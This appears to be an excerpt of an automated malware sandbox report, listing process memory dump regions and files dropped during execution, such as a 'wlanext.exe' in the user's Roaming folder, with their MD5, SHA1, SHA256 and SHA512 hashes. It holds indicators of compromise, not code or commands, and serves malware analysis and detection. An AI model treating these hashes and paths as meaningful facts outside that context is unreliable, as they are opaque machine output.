memory/860-64-0x00000000066C0000-0x00000000066C8000-memory.dmp
memory/860-70-0x0000000070EEE000-0x0000000070EEF000-memory.dmp
memory/860-71-0x0000000070EE0000-0x0000000071690000-memory.dmp
memory/860-72-0x00000000074D0000-0x00000000074F2000-memory.dmp
memory/860-73-0x0000000008560000-0x0000000008B04000-memory.dmp
C:\Users\Admin\AppData\Roaming\wlanext.exe
| MD5 | 7423e3013a2ca93513e9f1024dfe1cc8 |
| SHA1 | 525281537f75c168ca4015df438bb83a7784931a |
| SHA256 | 8e3951372f996dd248695a54af7ff1a5cde1059689aa43d953712e6c0744c0df |
| SHA512 | d5189a52b0cb9db2da33b7d8a61278e5e8edf0d1f075695dc5e99178e47b319658f8cf3e8339ee8bf24c548b3a38c01265250edf173f368dbea062ada78baea0 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\POwersHeLl.ExE.log
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c5f8dfb461b6247744a34510486518a8 |
| SHA1 | c7867fc3ce3027fbec8bed02f2d2ecb3f9daf5bd |
| SHA256 | 5090beccaeebcc44cd6efe04b0948c62130fe755597ef8a417a5eb5f4d731fb0 |
| SHA512 | c46fdf496fc842b4ab25491b3cc0a20f73c68cf3167a27bf0457ab5036878614fe40bb86dc94d1fb3d094f0c6a38a45034a93102a24c88d920e33f8e8b4ace9f |
memory/860-87-0x0000000070EE0000-0x0000000071690000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\autE0CB.tmp
| MD5 | 5fc0e7bec89d9a4e021d88dd1cf731b2 |
| SHA1 | 26ea02938cb1eb51a1ac601ab1b068a130cc3719 |
| SHA256 | 532d407f3bdbd28145b385a4e15c80117e07e89f2ba16f1f620fe20cf213783d |
| SHA512 | 1c54091984fb41f43dbf7c7676184482ca853fb33e41780a323aec0ca21759e2a91af3bff30a947579811882d1c710a138e7e57dea2d9790e5092e68b768664f |
memory/4744-101-0x0000000000400000-0x0000000000447000-memory.dmp
memory/2060-102-0x0000000000D50000-0x0000000000D94000-memory.dmp
memory/2060-103-0x0000000000D50000-0x0000000000D94000-memory.dmp
memory/4368-104-0x00000000050E0000-0x00000000051B1000-memory.dmp
memory/1380-111-0x000001CC5D280000-0x000001CC5D39F000-memory.dmp